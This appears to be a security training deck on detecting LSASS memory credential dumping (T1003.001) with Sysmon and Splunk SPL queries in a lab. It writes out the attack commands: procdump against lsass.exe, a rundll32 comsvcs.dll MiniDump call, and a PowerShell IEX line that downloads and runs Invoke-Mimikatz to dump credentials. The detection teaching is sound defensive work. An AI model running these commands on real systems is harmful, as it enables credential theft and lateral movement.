MITRE ATT&CK Techniques - OS Credential Dumping
https://redcanary.com/threat-detection-report/techniques/lsass-memory/
https://www.picussecurity.com/resource/blog/picus-10-critical-mitre-attck-techniques-t1003-credential-dumping
- Goal: detect credential dumping performed by an attacker using the Splunk SIEM.
- Achievement: create rules/SPL searches so that the SIEM detects the processes run by the attacker.
- Impact: adversaries can use credentials gathered by this technique to:
  - Access restricted information
  - Access critical assets
  - Perform lateral movement through the network by compromising other systems using the same credentials
  - Create new accounts, perform actions, and remove the new account to clear tracks
  - Analyze password patterns and password policy to reveal other credentials
OS Credential Dumping
(Technique: Credential Dumping - T1003.001 LSASS Memory)
Introduction
Technique: Credential Dumping - T1003.001 LSASS Memory
- This technique enables adversaries to obtain account login and password information from the operating system and software.
- The Local Security Authority Subsystem Service (LSASS) stores the credentials of logged-in users in memory to provide seamless access to network resources without re-entering their credentials.
How?
- The attacker needs to interact with the lsass.exe process and dump its memory.
Methods
- Several methods and tools can be used to dump credentials from memory:
1. Windows Task Manager: the Create Dump File feature of Task Manager can dump the memory of the lsass.exe process (available since Windows Vista/Server 2008).
2. ProcDump: a command-line utility that is part of the Microsoft Sysinternals suite; commonly used by attackers.
3. Comsvcs.dll: a native Windows DLL located in the %systemroot%\system32 directory. It has a MiniDump function that can dump lsass.exe process memory, from which credentials can be retrieved.
LSASS process memory
- The Local Security Authority Subsystem Service (LSASS) stores credentials in memory on behalf of users with active Windows sessions.
- This allows users to seamlessly access network resources, such as file shares, Exchange Server mailboxes, and SharePoint sites, without re-entering their credentials for each remote service.
- Passwords stored in LSASS process memory can be used to conduct lateral movement.
Use Case
(Diagram: the attacker gains access to the victim's machine, then dumps LSASS via Procdump, Task Manager, or Comsvcs.dll.)
Attack Diagram
(Diagram: the attacker gained access to the victim's machine and uses the OS Credential Dumping technique to obtain account logins and passwords.)
- Client PC (Victim): 10.10.10.x
- Splunk SIEM Server: 192.168.10.x
Pre-requisites
- VM test machine running Windows
- Splunk Server
- Splunk Forwarder
- Sysmon enabled
- Procdump
OS Credential Dumping (Technique: Credential Dumping - T1003.001 LSASS Memory) – Attack Flow
LSASS Dump via Windows Task Manager – 1st Method
- Dumping the memory of the lsass.exe process with Task Manager:
- Open Task Manager and click "More details" to show all processes.
- Right-click on "Local Security Authority Process" under Windows Processes.
- Click "Create dump file".
One way this can be achieved is through Task Manager itself, by right-clicking on lsass.exe and selecting "Create dump file". This way no suspicious executable needs to be uploaded to the target machine; the attacker can then download the DMP file and extract the credentials offline.
Credentials were dumped manually via Task Manager as the attackers RDPed into each system – RDP vulnerability exploited.
Result from Splunk:
SPL Command: index=* source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11 TargetFilename="*lsass*.dmp" Image="C:\Windows\*\taskmgr.exe" | table TaskCategory, EventCode, Image, TargetFilename
Note:
- This is the query used in Splunk to detect credential dumping with this method.
- For this method we look for Sysmon EventCode 11, which refers to the 'File Create' operation.
- The process associated with the 'File Create' operation is Task Manager, and the name of the created file contains .dmp, i.e. a dump file.
LSASS Dump via Procdump – 2nd Method
- Download Procdump. It is a Windows Sysinternals tool that creates dumps of processes.
- Use the command: procdump.exe -accepteula -ma lsass.exe lsass.dmp
The file is dumped successfully.
***Note: needs to run as administrator.
Procdump
- Is legitimate software, so it is not considered malware when run.
- Its primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike, which an administrator or developer can use to determine the cause of the spike.
Possible vulnerability exploited:
SMB protocol – the attacker can gain access to a victim share and upload Procdump to execute it.
Result from Splunk:
SPL Command: index=* source="WinEventLog:Microsoft-Windows-Sysmon/Operational" (EventCode=1 Image="*procdump*.exe" CommandLine="*lsass*") OR (EventCode=10 TargetImage="C:\WINDOWS\system32\lsass.exe" GrantedAccess="0x1FFFFF" ("procdump")) | dedup TaskCategory | table _time, RuleName, TaskCategory, SourceImage, TargetImage, CommandLine, GrantedAccess
Note:
- For this method we look for Sysmon EventCode 1 ('Process Create') and EventCode 10 ('Process Access').
- Process Create detects when the procdump application is executed, and Process Access detects which process procdump is accessing, in this case the LSASS process.
- Since we are using a custom Sysmon configuration, anything related to credential dumping from LSASS is tagged with the rule name technique_name=Credential Dumping. This is already configured.
LSASS Dump via Comsvcs.dll – 3rd Method
- We need the process ID of lsass.exe to dump its memory using Comsvcs.dll:
- Use the command: Get-Process lsass
Comsvcs.dll is a built-in Windows DLL; it has a MiniDump function which can be used to dump lsass.exe process memory.
Dynamic-link library
- Library files contain code to carry out a specific function for an application in the Windows operating system.
Cont…
- Use the command: .\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 692 C:\test\lsass.dmp full
(692 is the lsass.exe process ID obtained from Get-Process in the previous step.)
***Note: needs to run as administrator.
- The Windows DLL Host (rundll32.exe) is used to execute and call the MiniDumpW function in comsvcs.dll.
- It then creates a MiniDump file.
****
The original MiniDumpW function in comsvcs.dll is actually used by developers to debug applications when they crash.
Result from Splunk:
SPL Command: index=* source="WinEventLog:Microsoft-Windows-Sysmon/Operational" comsvcs.dll | table RuleName, EventCode, TaskCategory, Image, ImageLoaded, SourceImage, TargetImage, CommandLine
Note:
- For this method we look in Splunk for any event related to comsvcs.dll.
- We are able to detect 3 important event codes associated with comsvcs.dll: EventCode 1, 7 and 10.
1 = Process Create: detects execution of Windows rundll32.exe
7 = Image Loaded: rundll32.exe loaded comsvcs.dll (to execute the MiniDump function)
10 = Process Access: detects the process accessing lsass.exe
Alert Triggered
How does the attacker extract passwords from the dump file?
- Using Mimikatz
- After creating a dump file of the lsass.exe process, the attacker can use Mimikatz to extract password hashes.
- Either the attacker downloads Mimikatz to the victim's PC and executes it, or the attacker uploads the generated dump file to their own PC to crack the hashes offline.
How?
- Command: IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
References:
- https://redcanary.com/threat-detection-report/techniques/lsass-memory/ (comsvcs)
- https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz (all)
- https://www.picussecurity.com/resource/blog/picus-10-critical-mitre-attck-techniques-t1003-credential-dumping (all, including Invoke-Mimikatz)

Speaker notes

1. Add another point under Achievement: from a SOC analysis perspective, the impact of privilege escalation.